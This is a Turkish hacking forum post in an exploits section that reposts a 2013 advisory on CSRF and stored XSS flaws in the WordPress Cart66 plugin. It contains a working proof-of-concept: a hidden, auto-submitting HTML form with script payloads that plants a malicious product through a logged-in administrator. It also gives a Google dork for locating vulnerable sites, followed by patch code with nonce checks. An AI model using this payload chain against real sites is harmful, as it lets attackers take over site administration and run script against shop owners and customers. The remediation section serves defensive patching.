Turkhackteam.net/org - Turkish Hacking & Security Platform  
Geri git   Turkhackteam.net/org - Turkish Hacking & Security Platform >
Turkhackteam Under Ground
> Exploitler > Bug Researchers

Bug Researchers Yeni bulunan açıklar.



Wordpress Cart66 Plugin 1.5.1.14 - Multiple Vulnerabilities

Bug Researchers

Yeni Konu aç Cevapla
 
Seçenekler
Alt 08-02-2014 17:46   #1
  • Özel Üye
  • Üye Bilgileri
Üyelik tarihi
01/2013
Nereden
İstanbul
Mesajlar
Konular

Teşekkür (Etti): 4227
Teşekkür (Aldı): 6361


Wordpress Cart66 Plugin 1.5.1.14 - Multiple Vulnerabilities



Kod:
# Exploit Title:**** Wordpress Cart66 Plugin 1.5.1.14 Multiple Vulnerabilities
# Exploit Author:*** absane
# Blog:************* http://blog.noobroot.com
# Discovery date:*** September 29th 2013
# Vendor notified:** September 29th 2013
# Vendor fixed:***** October 2 2013
# Vendor Homepage:** http://cart66.com
# Software Link:**** http://downloads.wordpress.org/plugin/cart66-lite.1.5.1.14.zip
# Tested on:******** Wordpress 3.6.1
# Google-dork:****** inurl:/wp-content/plugins/cart66
# CVE (CSRF):******* CVE-2013-5977
# CVE (XSS):******** CVE-2013-5978
*
Two vulnerabilities were discovered in the Wordpress plugin Cart66 version 1.5.1.14.
*
Vulnerabilities:
1) CSRF
2) XSS (Stored)
*
*
VULNERABILITY #1
************
*** CSRF ***
************
Page affected: http://[victim_site]/wordpress/wp-admin/admin.php?page=cart66-products
*
If the Wordpress admin were logged in and clicked on a link hosting code similar to the one in the PoC, then the admin may unknowingly add a product to his site or have an existing product altered. Other possibilities include, but are not limited to, injecting code into a field vulnerable to stored XSS (see the second vulnerability).
*
================
Proof of Concept
================
Host this code on a remote wesbserver different from the Wordpress site that uses Cart66. As an authenticated Wordpress admin user visit the page and add what you will to the fields. A new product is added. In a live attack, the fields will be hidden, prefilled, and some javascript code will auto submit the fields.
*
*
<html><body>
<form name="csrf_form" action="http://192.168.196.135/wordpress/wp-admin/admin.php?page=cart66-products" method="post" enctype="multipart/form-data" id="products-form">
<input type="hidden" name="cart66-action" value="save product" />
<input type="hidden" name="product[id]" value="" />
<input class="long" type="hidden" name='product[name]' id='product-name' value='**********alert("pwned")</script>' />
<input type='hidden' name='product[item_number]' id='product-item_number' value='1337' />
<input type='hidden' id="product-price" name='product[price]' value='13.37' />
<input type='hidden' id="product-price_description" name='product[price_description]' value='**********alert(";)")</script>' />
<input type='hidden' id="product-is_user_price" name='product[is_user_price]' value='0' />
<input type="hidden" id="product-min_price" name='product[min_price]' value='' />
<input type="hidden" id="product-max_price" name='product[max_price]' value='' /> 
<input type='hidden' id="product-taxable" name='product[taxable]' value='0'>
<input type='hidden' id="product-shipped" name='product[shipped]' value='1'>
<input type="hidden" id="product-weight" name="product[weight]" value=""* />
<input type="hidden" id="product-min_qty" name='product[min_quantity]' value='' />
<input type="hidden" id="product-max_qty" name='product[max_quantity]' value='' />
<script type="text/javascript">********.csrf_form.submit();</script>
</body></html>
*
*
//////////////////////////////////////////////////////////////////////////////////////////////////////////////
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
*
*
VULNERABILITY #2
*******************
*** Stored XSS* ***
*******************
Page affected: http://[victim_site]/wordpress/wp-admin/admin.php?page=cart66-products in the following input fields:
* Product name
* Price description
*
================
Proof of Concept
================
In the vulnerable fields add **********alert(0)</script> 
*
The product name XSS vuln is particiularly dangerous because an attacker can use the CSRF vulnerability to add a product whose name is a malicious script. All the admin user needs to do is view the product to be attacked.
*
]....................................[
]..............SOLUTIONS.............[
]....................................[
*
Grab the latest update! Or... 
*
XSS
----
In products.php, replace the line:
$product->setData($_POST['product']);
*
with:
$product->setData(Cart66Common::postVal('product'));
*
CSRF
----
In products.php, replace the following:
*
<form action="admin.php?page=cart66-products" method="post" enctype="multipart/form-data" id="products-form">
**<input type="hidden" name="cart66-action" value="save product" />
**<input type="hidden" name="product[id]" value="<?php echo $product->id ?>" />
**<div id="widgets-left" style="margin-right: 50px;">
****<div id="available-widgets">
*
with:
*
<form action="admin.php?page=cart66-products" method="post" enctype="multipart/form-data" id="products-form">
**<input type="hidden" name="cart66_product_nonce" value="<?php echo wp_create_nonce('cart66_product_nonce'); ?>" />
**<input type="hidden" name="cart66-action" value="save product" />
**<input type="hidden" name="product[id]" value="<?php echo $product->id ?>" />
**<div id="widgets-left" style="margin-right: 50px;">
****<div id="available-widgets">
*
And, in Cart66Product.php replace the validate() function with:
*
**public function validate() {
****$errors = array();
*****
****if(!wp_verify_nonce($_POST['cart66_product_nonce'], 'cart66_product_nonce')) {
******$errors['nonce'] = __("An unkown error occured, please try again later","cart66");
****}
****else {
******// Verify that the item number is present
******if(empty($this->item_number)) {
********$errors['item_number'] = __("Item number is required","cart66");
******}
*****
******if(empty($this->spreedlySubscriptionId))* {
********$this->spreedlySubscriptionId = 0;
******}
*****
******// Verify that no other products have the same item number
******if(empty($errors)) {
********$sql = "SELECT count(*) from $this->_tableName where item_number = %s and id != %d";
********$sql = $this->_db->prepare($sql, $this->item_number, $this->id);
********$count = $this->_db->get_var($sql);
********if($count > 0) {
**********$errors['item_number'] = __("The item number must be unique","cart66");
********}
******}
*****
******// Verify that if the product has been saved and there is a download path that there is a file located at the path
******if(!empty($this->download_path)) {
********$dir = Cart66Setting::getValue('product_folder');
********if(!file_exists($dir . DIRECTORY_SEPARATOR . $this->download_path)) {
**********$errors['download_file'] = __("There is no file available at the download path:","cart66") . " " . $this->download_path;
********}
******}
****}
*
****return $errors;
**}



___________________________________________

Sizin dediğiniz ”Vatan” dağda başlayıp çöplükte biter. Bizim bildiğimiz ”Vatan” yürekte başlayıp ”ŞEHADETLE” biter!

http://i.hizliresim.com/GkVJEb.gif

@blackspy_tht
blackspy@turkhackteam.info
 Offline  
 
Alıntı ile Cevapla
Teşekkür

8y H4cker Teşekkür etti.
Cevapla

Bookmarks

Seçenekler


Bilgilendirme Turkhackteam.net/org
Sitemizde yer alan konular üyelerimiz tarafından paylaşılmaktadır.
Bu konular yasalara uygunluk ve telif hakkı konusunda yönetimimiz tarafından kontrol edilse de, gözden kaçabilen içerikler yer alabilmektedir.
Bu tür konuları turkhackteamiletisim [at] gmail.com mail adresimize bildirebilirsiniz, konular hakkında en kısa sürede gerekli işlemler yapılacaktır.
Please Report Abuse, DMCA, Harassment, Scamming, Warez, Crack, Divx, Mp3 or any Illegal Activity to turkhackteamiletisim [at] gmail.com

Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz.
Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.



         

Powered by vBulletin® Copyright ©2000 - 2019

TSK Mehmetçik Vakfı

Türk Polis Teşkilatını Güçlendirme Vakfı

Google+
Pomeranian Boo
instagram takipci hilesi

wau